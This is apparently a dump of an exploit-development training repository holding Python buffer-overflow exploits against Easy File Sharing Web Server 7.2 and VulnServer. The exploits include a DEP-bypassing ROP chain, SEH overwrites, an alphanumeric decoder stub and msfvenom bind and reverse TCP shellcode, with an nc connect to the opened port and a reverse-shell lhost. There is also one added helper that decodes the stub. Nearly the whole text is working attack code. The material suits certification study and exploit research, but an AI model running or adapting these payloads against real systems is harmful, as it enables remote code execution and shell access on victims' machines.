# EDX = NewProtect (0x40)
buffer += struct.pack('<L', 0x10022c4c) # XOR EDX,EDX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
# ECX = lpOldProtect (ptr to W address)
buffer += struct.pack('<L', 0x1001b377) # POP ECX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c730ad) # &Writable location [sqlite3.dll]
# EBX = dwSize (0x00000501)
buffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0xfffffaff) # will become 0x00000501 after negate
buffer += struct.pack('<L', 0x100231d1) # NEG EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x1001da09) # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll]
buffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll]
buffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c730ad) # &Writable location [sqlite3.dll]
# EDI = ROP NOP (RETN)
buffer += struct.pack('<L', 0x10019f47) # POP EDI # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll]
# EAX = NOP (0x90909090)
buffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x90909090) # nop
buffer += struct.pack('<L', 0x100240c2) # PUSHAD # RETN [ImageLoad.dll]
buffer += "\x90" * 50 # nop
buffer += shellcode # calc.exe
buffer += "\x90" * 50 # nop
buffer += '\x45' * (1412-(4*88)+128-len(shellcode)-100)
buffer += '\x42' * 4 # nSEH filler
# SEH handler doubles as the stack pivot: ADD ESP,1004 moves ESP up into the buffer of A's where the ROP chain was placed (see the filler size above) and the RETN starts the chain
buffer += struct.pack('<L', 0x10022869) # SEH ADD ESP,1004 # RETN [ImageLoad.dll]
buffer += '\x44' * (5000-4059-4-4)
print "[+] Sending %s bytes of evil payload.." %len(buffer)
time.sleep(1)
try:
    cookies = dict(SESSIONID='6771', UserID=buffer,PassWD='')
    data=dict(frmLogin='',frmUserName='',frmUserPass='',login='')
    requests.post('http://'+host+':'+port+'/forum.ghp',cookies=cookies,data=data)
except:
    print "The server stopped responding. You should see calc.exe by now ;D"
================================================
FILE: Remote Buffer Overflow/EasyFileSharingWebServerv7.2/readme.md
================================================
### Easy File Sharing Web Server v7.2
Remote SEH based Buffer Overflow exploit with DEP bypass (ROP gadgets) using VirtualProtect() API. See the sploit on exploit-db [EDB-ID: 44522](https://www.exploit-db.com/exploits/44522/)

================================================
FILE: Remote Buffer Overflow/VulnServer/Bad Characters/Exploit.py
================================================
import time
import socket
import subprocess
'''
Notes:
======
- Bad characters are everything above '\x7f' and, obviously, '\x00'
- The bad character '\xff' gets converted to '\x80' by vulnserver, which we use for the backward jump ;)
- Manual shellcoding is required to jump to the start of the shellcode
- Used the Slink alphanumeric encoder found at https://github.com/ihack4falafel/Slink, whoever made this tool must be 1337 ;)
'''
#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00' -e x86/alpha_mixed BufferRegister=ESI -f python -v shellcode
#Payload size: 710 bytes
shellcode = ""
shellcode += "\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += "\x42\x75\x4a\x49\x49\x6c\x68\x68\x4b\x32\x77\x70"
shellcode += "\x37\x70\x53\x30\x45\x30\x6d\x59\x59\x75\x70\x31"
shellcode += "\x79\x50\x53\x54\x6e\x6b\x72\x70\x46\x50\x4c\x4b"
shellcode += "\x30\x52\x66\x6c\x4c\x4b\x53\x62\x54\x54\x4c\x4b"
shellcode += "\x50\x72\x67\x58\x76\x6f\x58\x37\x63\x7a\x76\x46"
shellcode += "\x34\x71\x69\x6f\x4e\x4c\x67\x4c\x55\x31\x53\x4c"
shellcode += "\x56\x62\x46\x4c\x75\x70\x4f\x31\x58\x4f\x44\x4d"
shellcode += "\x46\x61\x49\x57\x6a\x42\x78\x72\x33\x62\x72\x77"
shellcode += "\x4e\x6b\x73\x62\x34\x50\x4e\x6b\x43\x7a\x77\x4c"
shellcode += "\x4c\x4b\x32\x6c\x74\x51\x53\x48\x59\x73\x30\x48"
shellcode += "\x63\x31\x4b\x61\x52\x71\x4c\x4b\x50\x59\x61\x30"
shellcode += "\x66\x61\x7a\x73\x6c\x4b\x50\x49\x65\x48\x38\x63"
shellcode += "\x57\x4a\x63\x79\x4e\x6b\x64\x74\x6e\x6b\x73\x31"
shellcode += "\x68\x56\x45\x61\x49\x6f\x6c\x6c\x5a\x61\x78\x4f"
shellcode += "\x46\x6d\x37\x71\x69\x57\x75\x68\x4d\x30\x63\x45"
shellcode += "\x69\x66\x33\x33\x31\x6d\x49\x68\x67\x4b\x43\x4d"
shellcode += "\x35\x74\x44\x35\x48\x64\x52\x78\x6c\x4b\x56\x38"
shellcode += "\x34\x64\x57\x71\x4e\x33\x65\x36\x6e\x6b\x36\x6c"
shellcode += "\x32\x6b\x6c\x4b\x70\x58\x35\x4c\x53\x31\x5a\x73"
shellcode += "\x6e\x6b\x46\x64\x4c\x4b\x63\x31\x4a\x70\x4f\x79"
shellcode += "\x70\x44\x66\x44\x55\x74\x43\x6b\x43\x6b\x53\x51"
shellcode += "\x31\x49\x31\x4a\x50\x51\x39\x6f\x79\x70\x73\x6f"
shellcode += "\x53\x6f\x62\x7a\x6e\x6b\x32\x32\x48\x6b\x6c\x4d"
shellcode += "\x31\x4d\x50\x68\x76\x53\x57\x42\x63\x30\x63\x30"
shellcode += "\x32\x48\x71\x67\x62\x53\x67\x42\x63\x6f\x32\x74"
shellcode += "\x35\x38\x42\x6c\x52\x57\x64\x66\x34\x47\x79\x6f"
shellcode += "\x38\x55\x58\x38\x6c\x50\x36\x61\x53\x30\x55\x50"
shellcode += "\x66\x49\x58\x44\x32\x74\x36\x30\x55\x38\x35\x79"
shellcode += "\x4d\x50\x42\x4b\x37\x70\x69\x6f\x49\x45\x61\x7a"
shellcode += "\x64\x48\x56\x39\x66\x30\x59\x72\x69\x6d\x71\x50"
shellcode += "\x30\x50\x37\x30\x46\x30\x35\x38\x4b\x5a\x54\x4f"
shellcode += "\x59\x4f\x49\x70\x59\x6f\x7a\x75\x4d\x47\x73\x58"
shellcode += "\x54\x42\x67\x70\x32\x31\x71\x4c\x6c\x49\x79\x76"
shellcode += "\x52\x4a\x44\x50\x32\x76\x72\x77\x72\x48\x59\x52"
shellcode += "\x69\x4b\x67\x47\x31\x77\x39\x6f\x59\x45\x30\x57"
shellcode += "\x73\x58\x78\x37\x6a\x49\x54\x78\x69\x6f\x59\x6f"
shellcode += "\x68\x55\x32\x77\x70\x68\x53\x44\x4a\x4c\x57\x4b"
shellcode += "\x68\x61\x4b\x4f\x4e\x35\x33\x67\x4a\x37\x63\x58"
shellcode += "\x50\x75\x52\x4e\x62\x6d\x51\x71\x79\x6f\x6e\x35"
shellcode += "\x53\x58\x50\x63\x62\x4d\x63\x54\x73\x30\x4f\x79"
shellcode += "\x69\x73\x31\x47\x43\x67\x52\x77\x36\x51\x48\x76"
shellcode += "\x43\x5a\x56\x72\x51\x49\x31\x46\x7a\x42\x6b\x4d"
shellcode += "\x30\x66\x6f\x37\x73\x74\x74\x64\x77\x4c\x56\x61"
shellcode += "\x47\x71\x4e\x6d\x62\x64\x76\x44\x44\x50\x79\x56"
shellcode += "\x63\x30\x32\x64\x61\x44\x42\x70\x66\x36\x31\x46"
shellcode += "\x36\x36\x42\x66\x30\x56\x30\x4e\x70\x56\x53\x66"
shellcode += "\x63\x63\x62\x76\x42\x48\x62\x59\x38\x4c\x67\x4f"
shellcode += "\x6d\x56\x39\x6f\x6a\x75\x6d\x59\x59\x70\x42\x6e"
shellcode += "\x71\x46\x30\x46\x4b\x4f\x34\x70\x75\x38\x76\x68"
shellcode += "\x4c\x47\x67\x6d\x53\x50\x4b\x4f\x7a\x75\x6d\x6b"
shellcode += "\x58\x70\x38\x35\x4d\x72\x43\x66\x35\x38\x6c\x66"
shellcode += "\x6a\x35\x4f\x4d\x4d\x4d\x6b\x4f\x79\x45\x77\x4c"
shellcode += "\x43\x36\x63\x4c\x46\x6a\x4f\x70\x69\x6b\x4d\x30"
shellcode += "\x71\x65\x54\x45\x4f\x4b\x73\x77\x47\x63\x51\x62"
shellcode += "\x70\x6f\x30\x6a\x33\x30\x66\x33\x69\x6f\x39\x45"
shellcode += "\x41\x41"
buffer = 'LTER /.:/'
buffer += shellcode
buffer += '\x41' * (3495-124-len(shellcode))
buffer += '\x54' # PUSH ESP * compute where the decoder should write its output; otherwise the pushed dwords land in the wrong place and the decoded stub is corrupt
buffer += '\x58' # POP EAX
buffer += '\x05\x55\x11\x11\x11' # ADD EAX,11111155
buffer += '\x05\x55\x11\x11\x11' # ADD EAX,11111155
buffer += '\x2D\x25\x11\x22\x22' # SUB EAX,22221125
buffer += '\x54' # PUSH ESP * save ESP to ESI before the decoder alignment
buffer += '\x5E' # POP ESI
buffer += '\x50' # PUSH EAX
buffer += '\x5c' # pop esp
buffer += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a * after the encoder is done we will end up with the following code
buffer += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235 8BE6 MOV ESP,ESI # restore ESP
buffer += "\x05\x77\x63\x41\x41" ## add eax, 0x41416377 81C6 E5030000 ADD ESI,3E5 # add offset to shellcode from ESP to ESI
buffer += "\x05\x66\x53\x41\x41" ## add eax, 0x41415366 FFE6 JMP ESI # jump to ESI
buffer += "\x05\x55\x63\x41\x41" ## add eax, 0x41416355
buffer += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
buffer += "\x50" ## push eax
buffer += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
buffer += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
buffer += "\x05\x63\x12\x11\x11" ## add eax, 0x11111263
buffer += "\x05\x53\x12\x11\x11" ## add eax, 0x11111253
buffer += "\x05\x62\x12\x11\x11" ## add eax, 0x11111262
buffer += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
buffer += "\x50" ## push eax
buffer += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
buffer += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
buffer += "\x05\x46\x73\x41\x63" ## add eax, 0x63417346
buffer += "\x05\x45\x73\x40\x63" ## add eax, 0x63407345
buffer += "\x50" ## push eax
buffer += '\x41' * (124-73-31) # backward jump buffer space
buffer += '\x75\xff\x74\xff' # nSEH | jump backwards (always true)
buffer += '\x2b\x17\x50\x62' # SEH | 6250172B pop,pop,retn - clean address
buffer += '\x41' * (5000-9-3495-4-4) # junk
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.0.15', 9999))
    print '[+] Sending %s bytes of evil buffer..' %len(buffer)
    s.send(buffer)
    time.sleep(5)
    subprocess.call(['nc -nv 192.168.0.15 4444'], shell=True)
except Exception as e:
    print e
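The AND/ADD/SUB chains above decode, one PUSH EAX at a time, into the `MOV ESP,ESI / ADD ESI,3E5 / JMP ESI` stub the comments describe. As an added check (example code, not part of the repository), the helper below replays that 32-bit arithmetic on the exploit's own constants so an analyst can confirm what the pushed dwords decode to, independent of whatever EAX held beforehand:

```python
# Added analysis helper, not part of the original repository. It replays the
# AND/ADD/SUB arithmetic of the "Bad Characters" exploit above on a 32-bit EAX
# and shows which instruction bytes each PUSH EAX leaves on the stack.
import struct

MASK = 0xFFFFFFFF

# Each chain starts with the two AND masks that zero EAX regardless of its
# previous value, then ADD/SUB constants drawn from the allowed character set.
# The constants are copied from the exploit above, in program order.
CHAINS = [
    [("and", 0x554E4D4A), ("and", 0x2A313235),
     ("add", 0x41416377), ("add", 0x41415366), ("add", 0x41416355),
     ("sub", 0x33333333)],
    [("and", 0x554E4D4A), ("and", 0x2A313235),
     ("add", 0x11111263), ("add", 0x11111253), ("add", 0x11111262),
     ("sub", 0x33333333)],
    [("and", 0x554E4D4A), ("and", 0x2A313235),
     ("add", 0x63417346), ("add", 0x63407345)],
]


def run_chain(eax, ops):
    """Apply the ops to a 32-bit EAX value, wrapping like the CPU does."""
    for op, imm in ops:
        if op == "and":
            eax &= imm
        elif op == "add":
            eax = (eax + imm) & MASK
        elif op == "sub":
            eax = (eax - imm) & MASK
        else:
            raise ValueError("unknown op %r" % op)
    return eax


def masks_clear_eax(chains):
    """True if the two leading AND masks of every chain zero any EAX value."""
    return all(run_chain(MASK, c[:2]) == 0 for c in chains)


def decode_pushes(eax, chains):
    """Return the bytes the stack holds after each chain's PUSH EAX.

    The stack grows downwards, so the dword pushed last sits lowest in
    memory and executes first; the pushes are therefore concatenated in
    reverse order, each as a little-endian dword.
    """
    dwords = [run_chain(eax, c) for c in chains]
    return b"".join(struct.pack("<L", d) for d in reversed(dwords))


def decoded_hex(eax=0x41414141):
    """Hex string of the decoded stub for a starting EAX (default is the
    0x41 filler value the exploit writes everywhere)."""
    return decode_pushes(eax, CHAINS).hex()
```

The decoded bytes read `8B E6` (MOV ESP,ESI), `81 C6 E5 03 00 00` (ADD ESI,0x3E5) and `FF E6 90 90` (JMP ESI plus two NOPs), matching the comments in the exploit.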
================================================
FILE: Remote Buffer Overflow/VulnServer/Bad Characters/README.md
================================================
Structured Exception Handler overwrite with limited character set and small buffer size.
<p align="center">
<img src="https://github.com/ihack4falafel/OSCE/blob/master/Remote%20Buffer%20Overflow/VulnServer/Bad%20Characters/PoC.gif">
</p>
================================================
FILE: Remote Buffer Overflow/VulnServer/CALL [REG]/Exploit.py
================================================
#!/usr/bin/python
import struct
import time
import socket
from pwn import *
def BufferOverflow():
    # https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
    shellcode = ""
    shellcode += "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
    shellcode += "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
    shellcode += "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
    shellcode += "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
    shellcode += "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
    shellcode += "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
    shellcode += "\x45\x81\x3e\x43\x72\x65\x61\x75"
    shellcode += "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
    shellcode += "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
    shellcode += "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
    shellcode += "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
    shellcode += "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
    shellcode += "\x6c\x63\x89\xe2\x52\x52\x53\x53"
    shellcode += "\x53\x53\x53\x53\x52\x53\xff\xd7"
    #----------------------------#
    # Payload                    #
    #----------------------------#
    # buffer = CMD + AAA padding # |---------------------------------------------------------+
    # buffer = EIP overwrite     # |-------| WinXP SP3 Pro : "\xFF\xE4" | [essfunc.dll] |----|-+
    # buffer = NOP sled          # |---------------------------------------------------------|-|-+
    # buffer = Shellcode         # |---------------------------------------------------------|-|-|-+
    # buffer = BBB padding       # |---------------------------------------------------------|-|-|-|-+
    #----------------------------#                                                           | | | | |
    #                                                                                        | | | | |
    buffer = "TRUN ." + "A" * 2006 # <-----------------------------------+                   | | | |
    buffer += struct.pack('<L', 0x625011af) # <-------------------------------------+       | | |
    buffer += "\x90" * 40 # <---------------------------------------+                        | |
    buffer += shellcode # <-----------------------------------------+                          |
    buffer += "B" * (3000-6-2006-4-40-len(shellcode)) # <-------------------------------------------+
    try:
        r = remote('192.168.199.140', 9999)
        r.recv(2048)
        print "[+] Sending %s bytes evil payload.." %len(buffer)
        r.send(buffer)
    except:
        print "Couldn't connect to target!"
def main():
    print (
    '''
    +-+-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+
    |V|u|l|n|S|e|r|v|e|r| |R|e|m|o|t|e| |B|u|f|f|e|r| |O|v|e|r|f|l|o|w|
    +-+-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+
    '''
    )
    BufferOverflow()
if __name__ == '__main__':
    main()
================================================
FILE: Remote Buffer Overflow/VulnServer/Egg Hunter/Exploit.py
================================================
import time
import socket
import subprocess
# root@kali:~# msfvenom -p windows/shell_reverse_tcp lhost=192.168.80.151 lport=1337 -b '\x00\x0a\x0d' -e x86/alpha_mixed BufferRegister=EDI -f python -v shellcode
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# No Arch selected, selecting Arch: x86 from the payload
# Found 1 compatible encoders
# Attempting to encode payload with 1 iterations of x86/alpha_mixed
# x86/alpha_mixed succeeded with size 702 (iteration=0)
# x86/alpha_mixed chosen with final size 702
# Payload size: 702 bytes
# Final size of python file: 3768 bytes
shellcode = ""
shellcode += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += "\x42\x75\x4a\x49\x49\x6c\x6a\x48\x4e\x62\x75\x50"
shellcode += "\x57\x70\x73\x30\x31\x70\x4b\x39\x48\x65\x74\x71"
shellcode += "\x59\x50\x55\x34\x4c\x4b\x42\x70\x66\x50\x6c\x4b"
shellcode += "\x53\x62\x76\x6c\x4e\x6b\x53\x62\x46\x74\x6e\x6b"
shellcode += "\x53\x42\x56\x48\x76\x6f\x6c\x77\x72\x6a\x46\x46"
shellcode += "\x36\x51\x39\x6f\x6e\x4c\x47\x4c\x50\x61\x31\x6c"
shellcode += "\x76\x62\x74\x6c\x61\x30\x4f\x31\x38\x4f\x76\x6d"
shellcode += "\x46\x61\x69\x57\x59\x72\x39\x62\x30\x52\x30\x57"
shellcode += "\x4c\x4b\x52\x72\x74\x50\x6e\x6b\x72\x6a\x65\x6c"
shellcode += "\x4c\x4b\x32\x6c\x44\x51\x30\x78\x6d\x33\x52\x68"
shellcode += "\x36\x61\x4a\x71\x52\x71\x4c\x4b\x56\x39\x45\x70"
shellcode += "\x56\x61\x6a\x73\x6c\x4b\x53\x79\x57\x68\x79\x73"
shellcode += "\x37\x4a\x62\x69\x4e\x6b\x75\x64\x4e\x6b\x43\x31"
shellcode += "\x69\x46\x45\x61\x4b\x4f\x4c\x6c\x6a\x61\x48\x4f"
shellcode += "\x54\x4d\x45\x51\x58\x47\x56\x58\x4d\x30\x44\x35"
shellcode += "\x4b\x46\x46\x63\x43\x4d\x68\x78\x77\x4b\x43\x4d"
shellcode += "\x34\x64\x61\x65\x38\x64\x56\x38\x4e\x6b\x53\x68"
shellcode += "\x45\x74\x55\x51\x58\x53\x70\x66\x6c\x4b\x46\x6c"
shellcode += "\x32\x6b\x4e\x6b\x46\x38\x77\x6c\x66\x61\x49\x43"
shellcode += "\x4e\x6b\x43\x34\x4e\x6b\x55\x51\x7a\x70\x6d\x59"
shellcode += "\x37\x34\x71\x34\x65\x74\x43\x6b\x33\x6b\x63\x51"
shellcode += "\x71\x49\x50\x5a\x70\x51\x49\x6f\x69\x70\x73\x6f"
shellcode += "\x43\x6f\x31\x4a\x6e\x6b\x42\x32\x5a\x4b\x4c\x4d"
shellcode += "\x53\x6d\x61\x78\x77\x43\x70\x32\x73\x30\x57\x70"
shellcode += "\x61\x78\x34\x37\x53\x43\x34\x72\x53\x6f\x31\x44"
shellcode += "\x30\x68\x30\x4c\x42\x57\x77\x56\x63\x37\x79\x6f"
shellcode += "\x69\x45\x6f\x48\x4a\x30\x35\x51\x53\x30\x73\x30"
shellcode += "\x76\x49\x68\x44\x31\x44\x72\x70\x35\x38\x64\x69"
shellcode += "\x6f\x70\x50\x6b\x65\x50\x4b\x4f\x58\x55\x30\x50"
shellcode += "\x72\x70\x52\x70\x50\x50\x73\x70\x52\x70\x61\x50"
shellcode += "\x32\x70\x51\x78\x79\x7a\x46\x6f\x69\x4f\x69\x70"
shellcode += "\x79\x6f\x4a\x75\x6c\x57\x62\x4a\x43\x35\x61\x78"
shellcode += "\x4f\x30\x69\x38\x72\x70\x6f\x67\x72\x48\x54\x42"
shellcode += "\x55\x50\x65\x55\x75\x69\x4f\x79\x6a\x46\x33\x5a"
shellcode += "\x56\x70\x33\x66\x62\x77\x50\x68\x7a\x39\x6d\x75"
shellcode += "\x50\x74\x33\x51\x49\x6f\x48\x55\x6b\x35\x69\x50"
shellcode += "\x51\x64\x46\x6c\x4b\x4f\x42\x6e\x47\x78\x52\x55"
shellcode += "\x48\x6c\x63\x58\x48\x70\x4d\x65\x49\x32\x33\x66"
shellcode += "\x79\x6f\x39\x45\x51\x78\x53\x53\x72\x4d\x63\x54"
shellcode += "\x55\x50\x6d\x59\x38\x63\x71\x47\x53\x67\x36\x37"
shellcode += "\x56\x51\x68\x76\x70\x6a\x65\x42\x56\x39\x50\x56"
shellcode += "\x49\x72\x49\x6d\x33\x56\x49\x57\x33\x74\x77\x54"
shellcode += "\x47\x4c\x37\x71\x75\x51\x6e\x6d\x53\x74\x67\x54"
shellcode += "\x72\x30\x49\x56\x63\x30\x57\x34\x50\x54\x70\x50"
shellcode += "\x36\x36\x61\x46\x51\x46\x52\x66\x51\x46\x62\x6e"
shellcode += "\x61\x46\x51\x46\x50\x53\x70\x56\x75\x38\x70\x79"
shellcode += "\x4a\x6c\x57\x4f\x4f\x76\x69\x6f\x6a\x75\x6b\x39"
shellcode += "\x59\x70\x52\x6e\x62\x76\x30\x46\x59\x6f\x74\x70"
shellcode += "\x61\x78\x47\x78\x4d\x57\x67\x6d\x65\x30\x79\x6f"
shellcode += "\x6a\x75\x4f\x4b\x6a\x50\x6f\x45\x4d\x72\x42\x76"
shellcode += "\x62\x48\x6d\x76\x6c\x55\x4d\x6d\x6f\x6d\x59\x6f"
shellcode += "\x39\x45\x45\x6c\x67\x76\x61\x6c\x66\x6a\x6d\x50"
shellcode += "\x39\x6b\x49\x70\x33\x45\x57\x75\x4d\x6b\x63\x77"
shellcode += "\x45\x43\x72\x52\x42\x4f\x31\x7a\x63\x30\x52\x73"
shellcode += "\x4b\x4f\x59\x45\x41\x41"
# first payload
Eggy = 'T00WT00W'
Eggy += shellcode
